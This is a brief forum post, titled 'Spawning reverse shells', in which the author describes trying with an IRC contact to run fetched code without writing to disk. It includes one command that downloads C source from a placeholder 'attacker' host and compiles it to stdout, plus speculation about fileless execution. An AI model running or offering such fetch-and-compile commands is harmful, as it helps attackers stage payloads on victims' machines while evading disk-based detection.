Spawning reverse shells

I was messing around with @IoTh1nkN0t on IRC, exploring the possibilities of running binary in the shell. You can already compile C code to stdout.

curl - s https://attacker/malicious-code.c | gcc -o /dev/stdout -x c -

We tried things like ./-, but it seems pretty difficult to execute code, without writing to the disk. In fact, it seems impossible. If we could find a good way to execute binary in the shell without writing to disk, we would have something that would be super useful for things like this.

5 Likes